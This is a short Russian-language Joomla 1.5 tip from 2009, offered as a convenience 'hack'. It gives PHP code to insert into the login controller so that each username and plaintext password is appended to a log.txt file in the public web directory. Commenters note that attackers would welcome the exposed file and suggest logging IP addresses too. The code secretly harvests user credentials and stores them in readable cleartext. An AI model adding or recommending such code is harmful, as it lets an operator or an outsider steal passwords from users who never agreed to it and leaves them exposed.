Хак: Как записать пароли пользователей?
05.01.2009 20:42
Вы хотите сделать так, чтобы в случае чего можно было сообщить старый пароль от портала, при этом не обнулять предыдущий пароль? Легко.

1. Создаем в каталоге components/com_user/ файл log.txt
2. Правим файл components/com_user/controller.php

2a. Ищем function login()
2б. Дописываем после

        $credentials = array();
        $credentials['username'] = JRequest::getVar('username', '', 'method', 'username');
        $credentials['password'] = JRequest::getString('passwd', '', 'post', JREQUEST_ALLOWRAW);

следующие строки:

$username = JRequest::getVar('username');
$passwd = JRequest::getVar('passwd');
$res = fopen ('components/com_user/log.txt',"a+"); 
    fputs ($res,"$username"); 
    fputs ($res,"::::"); 
    fputs ($res,"$passwd\n");
    fclose($res);

3. После того как юзер залогинится, в файле log.txt появится строка вида логин::::пароль

Как обновить Joomla ? Joomla 1.5.x< Предыдущая   Следующая >Хак: Любой пользователь может добавлять материал
 

Комментарии 

 
0 #1 Aleks_El_Dia 2009-05-23 17:44 Все хакеры мира будут признательны за такой файлик))) Цитировать
 
 
0 #2 CyberZombi 2009-06-13 13:25 оно то хорошо. но вот как это файло прикрыть из "ВНЕ" а-то в гугле запросов потмо появиться типа in url: Цитировать
 
 
0 #3 Alex 2009-07-31 17:19 А как сделать тоже самое только если авторизатор от Комьюнити Буилдера ? Цитировать
 
 
0 #4 antichrist 2009-08-06 06:44 Еще бы ипишники записывать, чтоб смотреть боты или нет ! Цитировать
 
 
0 #5 Сергей 2011-12-20 00:06 Цитирую Aleks_El_Dia:
Все хакеры мира будут признательны за такой файлик)))

А что мешает создать таблицу в БД и туда писать? Цитировать
 

Добавить комментарий

Защитный код
Обновить

На сайте

Сейчас 17 гостей онлайн